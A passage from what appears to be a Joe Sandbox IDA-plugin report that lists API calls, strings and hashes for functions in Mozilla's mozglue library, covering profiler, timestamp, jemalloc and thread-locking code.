ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEF59
GetCurrentThreadId.KERNEL32 ref: 6C9FEFB0
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEFBD
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEFE1
GetCurrentThreadId.KERNEL32 ref: 6C9FEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF000

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C9FF02F

Part of subcall function 6C9FF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9FF09B
Part of subcall function 6C9FF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C9FF0AC
Part of subcall function 6C9FF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C9FF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C9FF008
[I %d/%d] profiler_stop, xrefs: 6C9FEED7

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 0e658167807e96aead50ad952b99d9ce0f048d09529733404edb537111ae1950
Instruction ID: fba5e7d0b1aa72c4d53d89163bb55446a76fb57b30f0dbe9e532011375971f46
Opcode Fuzzy Hash: 0e658167807e96aead50ad952b99d9ce0f048d09529733404edb537111ae1950
Instruction Fuzzy Hash: 91515C316157228FDB285F68EC2879537B9EB56318F14825EF96DC3B81C7308847C7A1

Function 6C9ED010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6CA3E804), ref: 6C9ED047
GetSystemInfo.KERNEL32(?), ref: 6C9ED093
__Init_thread_footer.LIBCMT ref: 6C9ED0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CA3E810,00000040), ref: 6C9ED0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7B8,00001388), ref: 6C9ED147
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E744,00001388), ref: 6C9ED162
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E784,00001388), ref: 6C9ED18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6CA3E7DC,00001388), ref: 6C9ED1B1

Strings

MOZ_CRASH(), xrefs: 6C9ED277
<jemalloc>, xrefs: 6C9ED268, 6C9ED311
Compile-time page size does not divide the runtime one., xrefs: 6C9ED26D
: (malloc) Unsupported character in malloc options: ', xrefs: 6C9ED322
MALLOC_OPTIONS, xrefs: 6C9ED0CB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: f785d959b8a88636d126da4c74a1c9a971b11c4d1cc514abdc92d6da309e6d88
Instruction ID: 788b69bea8295512fb76515fef600f760036474cfb45561f1b65e7de79ed5d65
Opcode Fuzzy Hash: f785d959b8a88636d126da4c74a1c9a971b11c4d1cc514abdc92d6da309e6d88
Instruction Fuzzy Hash: 2B810371A003129FEB299F68DC68B6977B9FFAA304F148119E809D7B80D771DC46CB91

Function 6C9C5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5E9D

Part of subcall function 6C9D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B85
Part of subcall function 6C9D5B50: EnterCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5B90
Part of subcall function 6C9D5B50: LeaveCriticalSection.KERNEL32(6CA3F688,?,?,?,6C9D56EE,?,00000001), ref: 6C9D5BD8
Part of subcall function 6C9D5B50: GetTickCount64.KERNEL32 ref: 6C9D5BE4

GetCurrentThreadId.KERNEL32 ref: 6C9C5EAB
GetCurrentThreadId.KERNEL32 ref: 6C9C5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C9C6017

Part of subcall function 6C9B4310: moz_xmalloc.MOZGLUE(00000010,?,6C9B42D2), ref: 6C9B436A
Part of subcall function 6C9B4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9B42D2), ref: 6C9B4387

moz_xmalloc.MOZGLUE(00000004), ref: 6C9C5F47
GetCurrentProcess.KERNEL32 ref: 6C9C5F53
GetCurrentThread.KERNEL32 ref: 6C9C5F5C
GetCurrentProcess.KERNEL32 ref: 6C9C5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C9C5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C9C5F27

Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C5E8C

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C60CC

Strings

GeckoMain, xrefs: 6C9C5ECE, 6C9C6015

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 17df4fa22e845134dd8e5116a34d40ff4fb281a7268298f565acff64a162a3d5
Instruction ID: 85e51ffb8b193095c8fa9ff718dce978758b78df859cf1cf39003c33ce7ee62c
Opcode Fuzzy Hash: 17df4fa22e845134dd8e5116a34d40ff4fb281a7268298f565acff64a162a3d5
Instruction Fuzzy Hash: AA71CEB06057419FD714DF29D890A6ABBF0FF69304F14896DE48A87B52D730E889CB93

Function 6C9C9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9B31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C9B3217
Part of subcall function 6C9B31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C9B3236
Part of subcall function 6C9B31C0: FreeLibrary.KERNEL32 ref: 6C9B324B
Part of subcall function 6C9B31C0: __Init_thread_footer.LIBCMT ref: 6C9B3260
Part of subcall function 6C9B31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C9B327F
Part of subcall function 6C9B31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B328E
Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B32AB
Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B32D1
Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9B32E5
Part of subcall function 6C9B31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9B32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C9C9675
__Init_thread_footer.LIBCMT ref: 6C9C9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9C96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C9C9707
__Init_thread_footer.LIBCMT ref: 6C9C971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9C97B7
FreeLibrary.KERNEL32 ref: 6C9C97D0
FreeLibrary.KERNEL32 ref: 6C9C97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C9C9824

Strings

ntdll.dll, xrefs: 6C9C96E3
NtMapViewOfSection, xrefs: 6C9C9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C9C9670
MapViewOfFileNuma2, xrefs: 6C9C97B1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 16f51f29197625345a9dad3f0b69e7db6d6a9223f30bf2afa9afe650d8e6eeab
Instruction ID: 07338a6273f263b1bbf119e081ad2a1df30785f8513cf83f861d47b1be00749b
Opcode Fuzzy Hash: 16f51f29197625345a9dad3f0b69e7db6d6a9223f30bf2afa9afe650d8e6eeab
Instruction Fuzzy Hash: DA61F0717013029FDF189F68ECA8B9A7BB5EB4A318F118159E909C3790E730D855CBA2

Function 6C9C7FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C9C8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C9C801D

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C9C802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C9C803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C9C808D

Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C9C809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9C80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9C8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C9C8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C9C8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C9C817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9C8199

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: 35970cd4e1573b4afe5132a8f6a3f08f60c56ad8527e2fc0fd42781c8c6ba25c
Instruction ID: 102f70082ca19e889eadb7f7156649370305df42442342867c69415be0082c95
Opcode Fuzzy Hash: 35970cd4e1573b4afe5132a8f6a3f08f60c56ad8527e2fc0fd42781c8c6ba25c
Instruction Fuzzy Hash: 7751C6B1E002149BDB00DFA5DC84ADFB7B9EF59224F244125E815E7740E734ED05CBA2

Function 6CA16660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6CA3F618), ref: 6CA16694
GetThreadId.KERNEL32(?), ref: 6CA166B1
GetCurrentThreadId.KERNEL32 ref: 6CA166B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6CA166E1
EnterCriticalSection.KERNEL32(6CA3F618), ref: 6CA16734
GetCurrentProcess.KERNEL32 ref: 6CA1673A
LeaveCriticalSection.KERNEL32(6CA3F618), ref: 6CA1676C
GetCurrentThread.KERNEL32 ref: 6CA167FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CA16868
RtlCaptureContext.NTDLL ref: 6CA1687F

Strings

WalkStack64, xrefs: 6CA16890

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: caf2f78d681936aa6ed7721aca2586d7d635ecf3616f335c59afaaf4680be657
Instruction ID: 5c2dc5d4266bfda42c3c87b8339ec8b634ed65413354bf5bc1ce3ac29b08254e
Opcode Fuzzy Hash: caf2f78d681936aa6ed7721aca2586d7d635ecf3616f335c59afaaf4680be657
Instruction Fuzzy Hash: 35519B71A09311AFDB25CF24C844A9ABBF4FF89714F04892DF999C7B40D770D9498B92

Function 6C9FDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FDE73
GetCurrentThreadId.KERNEL32 ref: 6C9FDF7D
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FDF8A
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FDFC9
GetCurrentThreadId.KERNEL32 ref: 6C9FDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C9C4A68), ref: 6C9FDE7B

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C9C4A68), ref: 6C9FDEB8
free.MOZGLUE(00000000,?,6C9C4A68), ref: 6C9FDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9FDF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C9FDE83
<none>, xrefs: 6C9FDFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C9FE00E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: c793514472e75edac0a2a62a52be20b05a2c20b3bf214f5f0172a241091971b2
Instruction ID: f8fb5d2e01b3e4cfe89bf20d93c627ce11c88929c1e111ec2083c6871c8ae829
Opcode Fuzzy Hash: c793514472e75edac0a2a62a52be20b05a2c20b3bf214f5f0172a241091971b2
Instruction Fuzzy Hash: 7741E3327117129FEB249F68DC24BAA7776EB56308F148119E92DC7B41C731D817CBA2

Function 6CA0D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA0D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D52A
GetCurrentThreadId.KERNEL32 ref: 6CA0D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D55F
free.MOZGLUE(00000000), ref: 6CA0D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CA0D5D3
GetCurrentThreadId.KERNEL32 ref: 6CA0D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D652
GetCurrentThreadId.KERNEL32 ref: 6CA0D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA0D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA0D6A2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: d062b09dd6f6be5f57ffa36a71bdf62e3d5376e8dfe103e1097973ffcf738bdc
Instruction ID: 4e5a011f792771ed5f328c64a94f4c443c44880419a00355fd9a806adc4095e9
Opcode Fuzzy Hash: d062b09dd6f6be5f57ffa36a71bdf62e3d5376e8dfe103e1097973ffcf738bdc
Instruction Fuzzy Hash: 01517D71A04B06DFC714DF24D894A9ABBB5FF89358F10862EE84A87750DB30E885CB91

Function 6C9D5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C9D56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9D56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C9D56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C9D5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C9D57BC
GetTickCount64.KERNEL32 ref: 6C9D58CB
EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D58F3
__aulldiv.LIBCMT ref: 6C9D5945
LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CA3F638,?,?,?,?), ref: 6C9D59E9

Strings

MOZ_APP_RESTART, xrefs: 6C9D56CC

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 2685118868a04b0e87a8e65b9cc0c980f39c43ba612bd8077ce9303d52c865a9
Instruction ID: c0def0bd9cbef2577c8c9724eb26ec4553c69f6862e43e8f418a5cddae6e6a8b
Opcode Fuzzy Hash: 2685118868a04b0e87a8e65b9cc0c980f39c43ba612bd8077ce9303d52c865a9
Instruction Fuzzy Hash: 9BC18F71A187919FCB09CF28C85066AB7F1FF9A314F15CA5DE4C8A7660D730E886CB42

Function 6C9FEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FEC8C

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

GetCurrentThreadId.KERNEL32 ref: 6C9FECA1
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C9FECC5
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FED19
CloseHandle.KERNEL32(?), ref: 6C9FED28
free.MOZGLUE(00000000), ref: 6C9FED2F
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C9FEC94

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 7107396dcefeaf75a855aaf160fa465836da585b7a25b7b7df6d8c4e6f6f02c2
